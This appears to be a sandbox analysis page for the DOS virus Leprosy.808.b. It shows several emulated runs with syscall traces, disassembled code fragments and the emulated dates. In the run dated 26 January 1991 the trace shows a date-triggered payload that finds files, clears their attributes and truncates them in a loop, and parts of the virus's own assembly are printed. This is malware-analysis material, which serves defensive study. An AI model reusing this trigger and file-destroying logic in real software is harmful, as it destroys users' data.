Sample viewer

vx.netlux.org/Virus.DOS.Leprosy.808.b

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:28:58.750729369Z 48 PC: 12b36 | Get DOS version
2018-12-17T22:28:58.75253861Z 44 PC: 12b3e | Get time 0x12b3e: mov byte ptr [0x103], dl
0x12b42: mov dx, 0x146
0x12b45: mov ah, 0x1a
0x12b47: int 0x21
0x12b49: mov ah, 0x19
0x12b4b: int 0x21
0x12b4d: mov dl, al
0x12b4f: inc dl
0x12b51: mov ah, 0x47
0x12b53: mov si, 0x1a5
0x12b56: int 0x21
0x12b58: mov dx, 0x144
0x12b5b: mov ah, 0x3b
0x12b5d: int 0x21
0x12b5f: mov cx, 0x13
0x12b62: mov dx, 0x138
0x12b65: mov ah, 0x4e
0x12b67: int 0x21
0x12b69: cmp ax, 0x12
0x12b6c: jne 0x12b71
2018-12-17T22:28:58.754663208Z 26 PC: 12b49 | Set disk transfer address
2018-12-17T22:28:58.755630157Z 25 PC: 12b4d | Get default drive
2018-12-17T22:28:58.757611317Z 71 PC: 12b58 | Get current directory
2018-12-17T22:28:58.760448123Z 59 PC: 12b5f | Change current directory
2018-12-17T22:28:58.764332258Z 78 PC: 12b69 | Find first file
2018-12-17T22:28:58.776587221Z 87 PC: 12c4d | Get or set file date and time
2018-12-17T22:28:58.778110188Z 67 PC: 12c59 | Get or set file attributes
2018-12-17T22:28:58.783769699Z 59 PC: 12c60 | Change current directory
2018-12-17T22:28:58.78809214Z 59 PC: 12c67 | Change current directory
2018-12-17T22:28:58.790311952Z 42 PC: 12c6b | Get date 0x12c6b: cmp cx, 0x7c7
0x12c6f: jb 0x12ca1
0x12c71: cmp dl, 0x19
0x12c74: jb 0x12ca1
0x12c76: cmp al, 5
0x12c78: jne 0x12ca1
0x12c7a: mov dx, 0x146
0x12c7d: mov ah, 0x1a
0x12c7f: int 0x21
0x12c81: mov ah, 0x4e
0x12c83: mov cx, 7
0x12c86: mov dx, 0x140
0x12c89: int 0x21
0x12c8b: jb 0x12ca1
0x12c8d: mov ax, 0x4301
0x12c90: xor cx, cx
0x12c92: int 0x21
0x12c94: mov dx, 0x164
0x12c97: mov ah, 0x3c
0x12c99: int 0x21
2018-12-17T22:28:58.792459706Z 76 PC: 12ca6 | Terminate with return code (Return code = '0')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":5173,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:53:54.881638772Z 48 PC: 12b36 | Get DOS version
2018-12-25T11:53:54.88330098Z 44 PC: 12b3e | Get time 0x12b3e: mov byte ptr [0x103], dl
0x12b42: mov dx, 0x146
0x12b45: mov ah, 0x1a
0x12b47: int 0x21
0x12b49: mov ah, 0x19
0x12b4b: int 0x21
0x12b4d: mov dl, al
0x12b4f: inc dl
0x12b51: mov ah, 0x47
0x12b53: mov si, 0x1a5
0x12b56: int 0x21
0x12b58: mov dx, 0x144
0x12b5b: mov ah, 0x3b
0x12b5d: int 0x21
0x12b5f: mov cx, 0x13
0x12b62: mov dx, 0x138
0x12b65: mov ah, 0x4e
0x12b67: int 0x21
0x12b69: cmp ax, 0x12
0x12b6c: jne 0x12b71
2018-12-25T11:53:54.885968218Z 26 PC: 12b49 | Set disk transfer address
2018-12-25T11:53:54.887252761Z 25 PC: 12b4d | Get default drive
2018-12-25T11:53:54.888773701Z 71 PC: 12b58 | Get current directory
2018-12-25T11:53:54.8925151Z 59 PC: 12b5f | Change current directory
2018-12-25T11:53:54.896610823Z 78 PC: 12b69 | Find first file
2018-12-25T11:53:54.902497538Z 87 PC: 12c4d | Get or set file date and time
2018-12-25T11:53:54.905228239Z 67 PC: 12c59 | Get or set file attributes
2018-12-25T11:53:54.910998668Z 59 PC: 12c60 | Change current directory
2018-12-25T11:53:54.921199392Z 59 PC: 12c67 | Change current directory
2018-12-25T11:53:54.923777476Z 42 PC: 12c6b | Get date 0x12c6b: cmp cx, 0x7c7
0x12c6f: jb 0x12ca1
0x12c71: cmp dl, 0x19
0x12c74: jb 0x12ca1
0x12c76: cmp al, 5
0x12c78: jne 0x12ca1
0x12c7a: mov dx, 0x146
0x12c7d: mov ah, 0x1a
0x12c7f: int 0x21
0x12c81: mov ah, 0x4e
0x12c83: mov cx, 7
0x12c86: mov dx, 0x140
0x12c89: int 0x21
0x12c8b: jb 0x12ca1
0x12c8d: mov ax, 0x4301
0x12c90: xor cx, cx
0x12c92: int 0x21
0x12c94: mov dx, 0x164
0x12c97: mov ah, 0x3c
0x12c99: int 0x21
2018-12-25T11:53:54.927723448Z 76 PC: 12ca6 | Terminate with return code (Return code = '0')

{"DateBased":true,"Day":1,"Month":1,"Year":1991,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":5173,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:53:54.955989391Z 48 PC: 12b36 | Get DOS version
2018-12-25T11:53:54.958416075Z 44 PC: 12b3e | Get time 0x12b3e: mov byte ptr [0x103], dl
0x12b42: mov dx, 0x146
0x12b45: mov ah, 0x1a
0x12b47: int 0x21
0x12b49: mov ah, 0x19
0x12b4b: int 0x21
0x12b4d: mov dl, al
0x12b4f: inc dl
0x12b51: mov ah, 0x47
0x12b53: mov si, 0x1a5
0x12b56: int 0x21
0x12b58: mov dx, 0x144
0x12b5b: mov ah, 0x3b
0x12b5d: int 0x21
0x12b5f: mov cx, 0x13
0x12b62: mov dx, 0x138
0x12b65: mov ah, 0x4e
0x12b67: int 0x21
0x12b69: cmp ax, 0x12
0x12b6c: jne 0x12b71
2018-12-25T11:53:54.961580503Z 26 PC: 12b49 | Set disk transfer address
2018-12-25T11:53:54.963080428Z 25 PC: 12b4d | Get default drive
2018-12-25T11:53:54.966312684Z 71 PC: 12b58 | Get current directory
2018-12-25T11:53:54.969537982Z 59 PC: 12b5f | Change current directory
2018-12-25T11:53:54.974365742Z 78 PC: 12b69 | Find first file
2018-12-25T11:53:54.98494021Z 87 PC: 12c4d | Get or set file date and time
2018-12-25T11:53:54.986891481Z 67 PC: 12c59 | Get or set file attributes
2018-12-25T11:53:54.994841568Z 59 PC: 12c60 | Change current directory
2018-12-25T11:53:54.999033519Z 59 PC: 12c67 | Change current directory
2018-12-25T11:53:55.001728381Z 42 PC: 12c6b | Get date 0x12c6b: cmp cx, 0x7c7
0x12c6f: jb 0x12ca1
0x12c71: cmp dl, 0x19
0x12c74: jb 0x12ca1
0x12c76: cmp al, 5
0x12c78: jne 0x12ca1
0x12c7a: mov dx, 0x146
0x12c7d: mov ah, 0x1a
0x12c7f: int 0x21
0x12c81: mov ah, 0x4e
0x12c83: mov cx, 7
0x12c86: mov dx, 0x140
0x12c89: int 0x21
0x12c8b: jb 0x12ca1
0x12c8d: mov ax, 0x4301
0x12c90: xor cx, cx
0x12c92: int 0x21
0x12c94: mov dx, 0x164
0x12c97: mov ah, 0x3c
0x12c99: int 0x21
2018-12-25T11:53:55.004064504Z 76 PC: 12ca6 | Terminate with return code (Return code = '0')

{"DateBased":true,"Day":25,"Month":1,"Year":1991,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":5173,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:53:55.463487166Z 48 PC: 12b36 | Get DOS version
2018-12-25T11:53:55.465248602Z 44 PC: 12b3e | Get time 0x12b3e: mov byte ptr [0x103], dl
0x12b42: mov dx, 0x146
0x12b45: mov ah, 0x1a
0x12b47: int 0x21
0x12b49: mov ah, 0x19
0x12b4b: int 0x21
0x12b4d: mov dl, al
0x12b4f: inc dl
0x12b51: mov ah, 0x47
0x12b53: mov si, 0x1a5
0x12b56: int 0x21
0x12b58: mov dx, 0x144
0x12b5b: mov ah, 0x3b
0x12b5d: int 0x21
0x12b5f: mov cx, 0x13
0x12b62: mov dx, 0x138
0x12b65: mov ah, 0x4e
0x12b67: int 0x21
0x12b69: cmp ax, 0x12
0x12b6c: jne 0x12b71
2018-12-25T11:53:55.469589071Z 26 PC: 12b49 | Set disk transfer address
2018-12-25T11:53:55.471844146Z 25 PC: 12b4d | Get default drive
2018-12-25T11:53:55.474078718Z 71 PC: 12b58 | Get current directory
2018-12-25T11:53:55.477835634Z 59 PC: 12b5f | Change current directory
2018-12-25T11:53:55.482608146Z 78 PC: 12b69 | Find first file
2018-12-25T11:53:55.489412363Z 87 PC: 12c4d | Get or set file date and time
2018-12-25T11:53:55.491878143Z 67 PC: 12c59 | Get or set file attributes
2018-12-25T11:53:55.498293165Z 59 PC: 12c60 | Change current directory
2018-12-25T11:53:55.508518444Z 59 PC: 12c67 | Change current directory
2018-12-25T11:53:55.510946391Z 42 PC: 12c6b | Get date 0x12c6b: cmp cx, 0x7c7
0x12c6f: jb 0x12ca1
0x12c71: cmp dl, 0x19
0x12c74: jb 0x12ca1
0x12c76: cmp al, 5
0x12c78: jne 0x12ca1
0x12c7a: mov dx, 0x146
0x12c7d: mov ah, 0x1a
0x12c7f: int 0x21
0x12c81: mov ah, 0x4e
0x12c83: mov cx, 7
0x12c86: mov dx, 0x140
0x12c89: int 0x21
0x12c8b: jb 0x12ca1
0x12c8d: mov ax, 0x4301
0x12c90: xor cx, cx
0x12c92: int 0x21
0x12c94: mov dx, 0x164
0x12c97: mov ah, 0x3c
0x12c99: int 0x21
2018-12-25T11:53:55.513423854Z 26 PC: 12c81 | Set disk transfer address
2018-12-25T11:53:55.514665987Z 78 PC: 12c8b | Find first file
2018-12-25T11:53:55.527070659Z 67 PC: 12c94 | Get or set file attributes
2018-12-25T11:53:55.537973319Z 60 PC: 12c9b | Create or truncate file
2018-12-25T11:53:55.566145642Z 79 PC: 12c8b | Find next file (See above)
2018-12-25T11:53:55.570045839Z 67 PC: 12c94 | Get or set file attributes (See above)
2018-12-25T11:53:55.581179411Z 60 PC: 12c9b | Create or truncate file (See above)
2018-12-25T11:53:55.604990181Z 79 PC: 12c8b | Find next file (See above)
2018-12-25T11:53:55.608316125Z 67 PC: 12c94 | Get or set file attributes (See above)
2018-12-25T11:53:55.619730835Z 60 PC: 12c9b | Create or truncate file (See above)
2018-12-25T11:53:55.633395932Z 79 PC: 12c8b | Find next file (See above)
2018-12-25T11:53:55.636355055Z 67 PC: 12c94 | Get or set file attributes (See above)
2018-12-25T11:53:55.647697312Z 60 PC: 12c9b | Create or truncate file (See above)
2018-12-25T11:53:55.661908175Z 79 PC: 12c8b | Find next file (See above)
2018-12-25T11:53:55.664914632Z 67 PC: 12c94 | Get or set file attributes (See above)
2018-12-25T11:53:55.68255687Z 60 PC: 12c9b | Create or truncate file (See above)
2018-12-25T11:53:55.697673004Z 79 PC: 12c8b | Find next file (See above)
2018-12-25T11:53:55.701155344Z 67 PC: 12c94 | Get or set file attributes (See above)
2018-12-25T11:53:55.712792865Z 60 PC: 12c9b | Create or truncate file (See above)
2018-12-25T11:53:55.727279911Z 79 PC: 12c8b | Find next file (See above)
2018-12-25T11:53:55.730658252Z 67 PC: 12c94 | Get or set file attributes (See above)
2018-12-25T11:53:55.743147519Z 60 PC: 12c9b | Create or truncate file (See above)
2018-12-25T11:53:55.756959596Z 79 PC: 12c8b | Find next file (See above)
2018-12-25T11:53:55.760296288Z 67 PC: 12c94 | Get or set file attributes (See above)
2018-12-25T11:53:55.771873372Z 60 PC: 12c9b | Create or truncate file (See above)
2018-12-25T11:53:55.786738229Z 79 PC: 12c8b | Find next file (See above)
2018-12-25T11:53:55.789659343Z 67 PC: 12c94 | Get or set file attributes (See above)
2018-12-25T11:53:55.800904425Z 60 PC: 12c9b | Create or truncate file (See above)
2018-12-25T11:53:55.814700668Z 79 PC: 12c8b | Find next file (See above)
2018-12-25T11:53:55.818284735Z 76 PC: 12ca6 | Terminate with return code (Return code = '0')

{"DateBased":true,"Day":26,"Month":1,"Year":1991,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":5173,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:53:55.847809541Z 48 PC: 12b36 | Get DOS version
2018-12-25T11:53:55.849223211Z 44 PC: 12b3e | Get time 0x12b3e: mov byte ptr [0x103], dl
0x12b42: mov dx, 0x146
0x12b45: mov ah, 0x1a
0x12b47: int 0x21
0x12b49: mov ah, 0x19
0x12b4b: int 0x21
0x12b4d: mov dl, al
0x12b4f: inc dl
0x12b51: mov ah, 0x47
0x12b53: mov si, 0x1a5
0x12b56: int 0x21
0x12b58: mov dx, 0x144
0x12b5b: mov ah, 0x3b
0x12b5d: int 0x21
0x12b5f: mov cx, 0x13
0x12b62: mov dx, 0x138
0x12b65: mov ah, 0x4e
0x12b67: int 0x21
0x12b69: cmp ax, 0x12
0x12b6c: jne 0x12b71
2018-12-25T11:53:55.855595806Z 26 PC: 12b49 | Set disk transfer address
2018-12-25T11:53:55.856885317Z 25 PC: 12b4d | Get default drive
2018-12-25T11:53:55.858156739Z 71 PC: 12b58 | Get current directory
2018-12-25T11:53:55.862661407Z 59 PC: 12b5f | Change current directory
2018-12-25T11:53:55.86649588Z 78 PC: 12b69 | Find first file
2018-12-25T11:53:55.872118711Z 87 PC: 12c4d | Get or set file date and time
2018-12-25T11:53:55.874902712Z 67 PC: 12c59 | Get or set file attributes
2018-12-25T11:53:55.880450219Z 59 PC: 12c60 | Change current directory
2018-12-25T11:53:55.889181909Z 59 PC: 12c67 | Change current directory
2018-12-25T11:53:55.891914937Z 42 PC: 12c6b | Get date 0x12c6b: cmp cx, 0x7c7
0x12c6f: jb 0x12ca1
0x12c71: cmp dl, 0x19
0x12c74: jb 0x12ca1
0x12c76: cmp al, 5
0x12c78: jne 0x12ca1
0x12c7a: mov dx, 0x146
0x12c7d: mov ah, 0x1a
0x12c7f: int 0x21
0x12c81: mov ah, 0x4e
0x12c83: mov cx, 7
0x12c86: mov dx, 0x140
0x12c89: int 0x21
0x12c8b: jb 0x12ca1
0x12c8d: mov ax, 0x4301
0x12c90: xor cx, cx
0x12c92: int 0x21
0x12c94: mov dx, 0x164
0x12c97: mov ah, 0x3c
0x12c99: int 0x21
2018-12-25T11:53:55.894990461Z 76 PC: 12ca6 | Terminate with return code (Return code = '0')